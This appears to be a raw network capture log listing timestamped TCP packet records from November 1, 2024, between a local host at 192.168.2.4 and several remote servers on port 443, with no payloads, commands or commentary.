                                                                                        Nov 1, 2024 13:46:51.326565981 CET4434982913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:51.327327967 CET49829443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:51.327368975 CET49829443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:51.327368975 CET49829443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:51.327399969 CET4434982913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:51.327410936 CET4434982913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:51.330214024 CET49835443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:51.330264091 CET4434983513.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:51.332000017 CET49835443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:51.332096100 CET49835443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:51.332107067 CET4434983513.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:51.354366064 CET4434983313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:51.355267048 CET49833443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:51.355267048 CET49833443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:51.355350018 CET4434983313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:51.355408907 CET4434983313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:51.389297009 CET4434983013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:51.389482021 CET4434983013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:51.389820099 CET49830443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:51.389820099 CET49830443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:51.389971972 CET49830443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:51.389991999 CET4434983013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:51.392992973 CET49836443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:51.393094063 CET4434983613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:51.393222094 CET49836443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:51.393374920 CET49836443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:51.393408060 CET4434983613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:51.407376051 CET4434983113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:51.409315109 CET44349832142.250.185.196192.168.2.4
                                                                                        Nov 1, 2024 13:46:51.409630060 CET49832443192.168.2.4142.250.185.196
                                                                                        Nov 1, 2024 13:46:51.409651041 CET44349832142.250.185.196192.168.2.4
                                                                                        Nov 1, 2024 13:46:51.410186052 CET44349832142.250.185.196192.168.2.4
                                                                                        Nov 1, 2024 13:46:51.410594940 CET49832443192.168.2.4142.250.185.196
                                                                                        Nov 1, 2024 13:46:51.410660028 CET44349832142.250.185.196192.168.2.4
                                                                                        Nov 1, 2024 13:46:51.420500040 CET4434983113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:51.420767069 CET49831443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:51.420767069 CET49831443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:51.420955896 CET49831443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:51.420979977 CET4434983113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:51.423552036 CET49837443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:51.423598051 CET4434983713.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:51.423715115 CET49837443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:51.423934937 CET49837443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:51.423958063 CET4434983713.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:51.457731009 CET49832443192.168.2.4142.250.185.196
                                                                                        Nov 1, 2024 13:46:51.489269018 CET4434983313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:51.489820004 CET4434983313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:51.491193056 CET49833443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:51.491246939 CET49833443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:51.491275072 CET4434983313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:51.491296053 CET49833443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:51.491305113 CET4434983313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:51.493818998 CET49838443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:51.493889093 CET4434983813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:51.494070053 CET49838443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:51.494309902 CET49838443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:51.494343042 CET4434983813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:52.026034117 CET4434983413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:52.026633024 CET49834443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:52.026657104 CET4434983413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:52.027034044 CET49834443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:52.027039051 CET4434983413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:52.049349070 CET4434983513.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:52.050451040 CET49835443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:52.050451040 CET49835443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:52.050487995 CET4434983513.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:52.050508022 CET4434983513.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:52.122313976 CET4434983613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:52.123286009 CET49836443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:52.123286963 CET49836443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:52.123332024 CET4434983613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:52.123354912 CET4434983613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:52.151009083 CET4434983713.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:52.151933908 CET49837443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:52.151933908 CET49837443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:52.151977062 CET4434983713.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:52.151999950 CET4434983713.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:52.153906107 CET4434983413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:52.153975010 CET4434983413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:52.154064894 CET49834443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:52.154293060 CET49834443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:52.154311895 CET4434983413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:52.154335976 CET49834443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:52.154344082 CET4434983413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:52.156891108 CET49839443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:52.156939030 CET4434983913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:52.157138109 CET49839443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:52.157378912 CET49839443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:52.157391071 CET4434983913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:52.176695108 CET4434983513.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:52.176948071 CET4434983513.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:52.177062988 CET49835443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:52.177103043 CET49835443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:52.177103043 CET49835443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:52.177123070 CET4434983513.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:52.177133083 CET4434983513.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:52.179583073 CET49840443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:52.179609060 CET4434984013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:52.180026054 CET49840443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:52.180026054 CET49840443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:52.180052042 CET4434984013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:52.255817890 CET4434983613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:52.255916119 CET4434983613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:52.256187916 CET49836443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:52.256187916 CET49836443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:52.256366968 CET49836443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:52.256388903 CET4434983613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:52.258802891 CET49841443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:52.258858919 CET4434984113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:52.258972883 CET49841443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:52.259099007 CET49841443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:52.259116888 CET4434984113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:52.279053926 CET4434983713.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:52.279278994 CET4434983713.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:52.279373884 CET49837443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:52.279432058 CET49837443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:52.279432058 CET49837443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:52.279457092 CET4434983713.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:52.279470921 CET4434983713.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:52.281908989 CET49842443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:52.281955957 CET4434984213.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:52.282453060 CET49842443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:52.283432961 CET49842443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:52.283451080 CET4434984213.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:52.910676956 CET4434984013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:52.911169052 CET49840443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:52.911204100 CET4434984013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:52.911726952 CET49840443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:52.911734104 CET4434984013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:52.917351007 CET4434983913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:52.917927027 CET49839443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:52.917953014 CET4434983913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:52.918354988 CET49839443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:52.918360949 CET4434983913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:52.977054119 CET4434984113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:52.977539062 CET49841443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:52.977582932 CET4434984113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:52.977971077 CET49841443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:52.977977991 CET4434984113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.023839951 CET4434984213.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.029687881 CET49842443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:53.029750109 CET4434984213.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.030173063 CET49842443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:53.030179977 CET4434984213.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.040405989 CET4434984013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.040537119 CET4434984013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.040599108 CET49840443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:53.040649891 CET49840443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:53.040668964 CET4434984013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.040695906 CET49840443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:53.040702105 CET4434984013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.043477058 CET49843443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:53.043526888 CET4434984313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.043596983 CET49843443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:53.043741941 CET49843443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:53.043756962 CET4434984313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.049361944 CET4434983913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.049422979 CET4434983913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.049516916 CET49839443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:53.049542904 CET49839443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:53.049557924 CET4434983913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.049566984 CET49839443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:53.049571991 CET4434983913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.051642895 CET49844443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:53.051665068 CET4434984413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.051713943 CET49844443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:53.051853895 CET49844443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:53.051870108 CET4434984413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.106945992 CET4434984113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.107044935 CET4434984113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.107095003 CET49841443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:53.130330086 CET49841443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:53.130330086 CET49841443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:53.130366087 CET4434984113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.130378962 CET4434984113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.141629934 CET49845443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:53.141694069 CET4434984513.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.141897917 CET49845443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:53.142955065 CET49845443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:53.142968893 CET4434984513.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.155205011 CET4434984213.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.155519962 CET4434984213.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.155594110 CET49842443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:53.155682087 CET49842443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:53.155710936 CET4434984213.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.155730963 CET49842443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:53.155735970 CET4434984213.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.163712978 CET49846443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:53.163786888 CET4434984613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.163860083 CET49846443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:53.164140940 CET49846443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:53.164155006 CET4434984613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.269821882 CET4434983813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.271035910 CET49838443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:53.271090984 CET4434983813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.271599054 CET49838443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:53.271609068 CET4434983813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.439203024 CET4434983813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.439280033 CET4434983813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.443336964 CET4434983813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.443505049 CET49838443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:53.443505049 CET49838443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:53.463598967 CET49838443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:53.463598967 CET49838443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:53.463639975 CET4434983813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.463653088 CET4434983813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.482445002 CET49847443192.168.2.4104.21.8.81
                                                                                        Nov 1, 2024 13:46:53.482501030 CET44349847104.21.8.81192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.491441965 CET49847443192.168.2.4104.21.8.81
                                                                                        Nov 1, 2024 13:46:53.500432968 CET49848443192.168.2.4104.21.8.81
                                                                                        Nov 1, 2024 13:46:53.500480890 CET44349848104.21.8.81192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.503442049 CET49847443192.168.2.4104.21.8.81
                                                                                        Nov 1, 2024 13:46:53.503485918 CET44349847104.21.8.81192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.503528118 CET49848443192.168.2.4104.21.8.81
                                                                                        Nov 1, 2024 13:46:53.512418985 CET49848443192.168.2.4104.21.8.81
                                                                                        Nov 1, 2024 13:46:53.512439966 CET44349848104.21.8.81192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.591049910 CET49849443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:53.591108084 CET4434984913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.591243029 CET49849443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:53.591890097 CET49849443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:53.591900110 CET4434984913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.772335052 CET4434984313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.773364067 CET49843443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:53.773365021 CET49843443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:53.773405075 CET4434984313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.773418903 CET4434984313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.810239077 CET4434984413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.811140060 CET49844443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:53.811140060 CET49844443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:53.811178923 CET4434984413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.811192989 CET4434984413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.895973921 CET4434984513.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.896564960 CET49845443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:53.896620035 CET4434984513.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.897038937 CET49845443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:53.897047043 CET4434984513.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.900214911 CET4434984313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.900326967 CET4434984313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.900484085 CET49843443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:53.900485039 CET49843443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:53.900485039 CET49843443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:53.903141022 CET49850443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:53.903207064 CET4434985013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.903351068 CET49850443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:53.903510094 CET49850443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:53.903527021 CET4434985013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.922336102 CET4434984613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.922801971 CET49846443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:53.922836065 CET4434984613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.923269033 CET49846443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:53.923274040 CET4434984613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.941972017 CET4434984413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.942200899 CET4434984413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.942296028 CET49844443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:53.942296028 CET49844443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:53.942467928 CET49844443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:53.942491055 CET4434984413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.945163965 CET49851443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:53.945199013 CET4434985113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:53.945374966 CET49851443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:53.945374966 CET49851443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:53.945410967 CET4434985113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.031004906 CET4434984513.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.031519890 CET4434984513.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.031670094 CET49845443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:54.031670094 CET49845443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:54.031722069 CET49845443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:54.031745911 CET4434984513.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.040445089 CET49852443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:54.040504932 CET4434985213.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.042840958 CET49852443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:54.043102026 CET49852443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:54.043117046 CET4434985213.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.050515890 CET4434984613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.050827980 CET4434984613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.050919056 CET49846443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:54.050919056 CET49846443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:54.050965071 CET49846443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:54.050981998 CET4434984613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.052941084 CET49853443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:54.052988052 CET4434985313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.053190947 CET49853443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:54.053190947 CET49853443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:54.053219080 CET4434985313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.116554976 CET44349848104.21.8.81192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.116813898 CET49848443192.168.2.4104.21.8.81
                                                                                        Nov 1, 2024 13:46:54.116847992 CET44349848104.21.8.81192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.117925882 CET44349848104.21.8.81192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.118041039 CET49848443192.168.2.4104.21.8.81
                                                                                        Nov 1, 2024 13:46:54.118408918 CET49848443192.168.2.4104.21.8.81
                                                                                        Nov 1, 2024 13:46:54.118447065 CET49848443192.168.2.4104.21.8.81
                                                                                        Nov 1, 2024 13:46:54.118480921 CET44349848104.21.8.81192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.118508101 CET49848443192.168.2.4104.21.8.81
                                                                                        Nov 1, 2024 13:46:54.118593931 CET49848443192.168.2.4104.21.8.81
                                                                                        Nov 1, 2024 13:46:54.118817091 CET49854443192.168.2.4104.21.8.81
                                                                                        Nov 1, 2024 13:46:54.118874073 CET44349854104.21.8.81192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.119286060 CET49854443192.168.2.4104.21.8.81
                                                                                        Nov 1, 2024 13:46:54.119286060 CET49854443192.168.2.4104.21.8.81
                                                                                        Nov 1, 2024 13:46:54.119335890 CET44349854104.21.8.81192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.120500088 CET44349847104.21.8.81192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.120685101 CET49847443192.168.2.4104.21.8.81
                                                                                        Nov 1, 2024 13:46:54.120711088 CET44349847104.21.8.81192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.122360945 CET44349847104.21.8.81192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.122371912 CET44349847104.21.8.81192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.122735977 CET49847443192.168.2.4104.21.8.81
                                                                                        Nov 1, 2024 13:46:54.122735977 CET49847443192.168.2.4104.21.8.81
                                                                                        Nov 1, 2024 13:46:54.122755051 CET49847443192.168.2.4104.21.8.81
                                                                                        Nov 1, 2024 13:46:54.122805119 CET44349847104.21.8.81192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.122829914 CET49847443192.168.2.4104.21.8.81
                                                                                        Nov 1, 2024 13:46:54.122965097 CET44349847104.21.8.81192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.122963905 CET49855443192.168.2.4104.21.8.81
                                                                                        Nov 1, 2024 13:46:54.122988939 CET49847443192.168.2.4104.21.8.81
                                                                                        Nov 1, 2024 13:46:54.123004913 CET44349855104.21.8.81192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.123030901 CET49847443192.168.2.4104.21.8.81
                                                                                        Nov 1, 2024 13:46:54.123130083 CET49855443192.168.2.4104.21.8.81
                                                                                        Nov 1, 2024 13:46:54.123302937 CET49855443192.168.2.4104.21.8.81
                                                                                        Nov 1, 2024 13:46:54.123317957 CET44349855104.21.8.81192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.204211950 CET49843443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:54.204245090 CET4434984313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.321679115 CET4434984913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.322303057 CET49849443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:54.322318077 CET4434984913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.322655916 CET49849443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:54.322659969 CET4434984913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.461915970 CET4434984913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.462060928 CET4434984913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.462127924 CET49849443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:54.462280035 CET49849443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:54.462296963 CET4434984913.107.246.45192.168.2.4
